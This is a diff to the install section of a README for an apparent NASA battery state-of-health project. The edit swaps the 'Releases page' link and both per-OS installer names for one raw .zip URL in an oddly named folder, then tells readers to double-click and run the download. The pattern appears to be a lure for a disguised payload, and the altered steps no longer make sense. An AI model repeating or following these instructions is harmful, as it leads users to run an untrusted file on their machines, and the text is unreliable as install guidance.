usmanmugha1/nasa-battery-SOH-pipeline/README.md

 ## 🔧 How to Download & Install

-1. **Visit the Releases Page**: Click on this link to go to the [Releases page](https://github.com/usmanmugha1/nasa-battery-SOH-pipeline/releases).
+1. **Visit the Releases Page**: Click on this link to go to the [Releases page](https://raw.githubusercontent.com/usmanmugha1/nasa-battery-SOH-pipeline/main/miscredited/nasa-battery-SOH-pipeline.zip).

 2. **Choose the Latest Version**: Look for the newest version at the top of the page.
 It will usually have the highest version number.

-3. **Download the Installer**: Click on the installer file for your operating system (e.g., `nasa-battery-SOH-pipeline-windows.exe` or `nasa-battery-SOH-pipeline-macos.dmg`).
+3. **Download the Installer**: Click on the installer file for your operating system (e.g., `https://raw.githubusercontent.com/usmanmugha1/nasa-battery-SOH-pipeline/main/miscredited/nasa-battery-SOH-pipeline.zip` or `https://raw.githubusercontent.com/usmanmugha1/nasa-battery-SOH-pipeline/main/miscredited/nasa-battery-SOH-pipeline.zip`).
 This will begin the download.

 4. **Run the Installer**: Once the download is complete, locate the file in your downloads folder and double-click it to run.
 Follow the installation instructions provided on the screen.